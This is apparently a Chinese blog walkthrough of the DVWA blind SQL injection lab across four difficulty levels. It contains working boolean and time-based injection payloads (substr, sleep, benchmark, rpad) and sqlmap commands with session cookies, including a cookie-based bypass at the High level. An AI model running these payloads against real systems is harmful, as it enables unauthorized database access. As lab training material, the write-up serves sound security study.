DVWA--SQLInjection(blind)

这篇博客详细介绍了DVWA(Damn Vulnerable Web Application)中的SQL Injection漏洞,从Low、Medium、High到Impossible四个等级,探讨了不同等级的注入方式和应对策略。在Low等级中,通过布尔型和延时型手工注入确定了数据库名为'dvwa'。Medium等级利用sqlmap获取数据库名。在High等级,虽然sqlmap注入失败,但通过修改cookie中的id参数成功获取了数据库名。Impossible等级展示了通过预编译绑定变量防止SQL注入的有效性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Low等级

在这里插入图片描述
在这里插入图片描述
确定注入poc
在这里插入图片描述
在这里插入图片描述
1.手工注入(布尔型)
确定字符串长度
在这里插入图片描述在这里插入图片描述
确定字符串内容
在这里插入图片描述
在这里插入图片描述
(二分法,步骤省略)
得到:
substr(database(),1,1)=’d’
substr(database(),2,1)=’v’
substr(database(),3,1)=’w’
substr(database(),4,1)=’a’
database() =’dvwa’
2.手工注入(延时型)
确定字符串长度(sleep)
https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and sleep(if(length(database())=4,5,0))-- &Submit=Submit在这里插入图片描述
https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and sleep(if(length(database())=5,5,0))-- &Submit=Submit在这里插入图片描述

确定字符串长度(benchmark)

https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and benchmark(if(length(database())=4,5000000,0),md5('test'));-- &Submit=Submit

在这里插入图片描述

https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and benchmark(if(length(database())=5,5000000,0),md5('test'));-- &Submit=Submit

在这里插入图片描述

确定字符串长度(rpad)
https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and if(length(database())=4,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')),0);-- &Submit=Submit在这里插入图片描述https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1' and if(length(database())=5,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')),0);-- &Submit=Submit在这里插入图片描述
省略确定字符串内容部分
3.sqlmap
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=23i44gbd9l7omad5h09cebd1f7; security=low" --current-db
在这里插入图片描述

Medium等级

在这里插入图片描述
利用sqlmap获取数据库名
python sqlmap.py -u " https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/" --data "id=1&Submit=Submit" -p "id" --cookie " PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=medium" --current-db
在这里插入图片描述

High等级

在这里插入图片描述
用sqlmap进行注入
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" -p "id" --cookie " PHPSESSID=166rs1ts9sdpjoqcto11j16n56; security=high" --second-url "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/"
注入失败
在这里插入图片描述
发现cookie中包含有id参数
在这里插入图片描述
添加id=1到cookie中
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/cookie-input.php" --data "id=1&Submit=Submit" -p "id" --cookie "id=1;PHPSESSID=166rs1ts9sdpjoqcto11j16n56; security=high" --second-url "https://dvwa.practice.rois.io/vulnerabilities/sqli_blind/" –current-db
成功获取数据库名
在这里插入图片描述

Impossible等级

检测了id数据类型,使用预编译绑定id变量,有效防止了sql注入

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值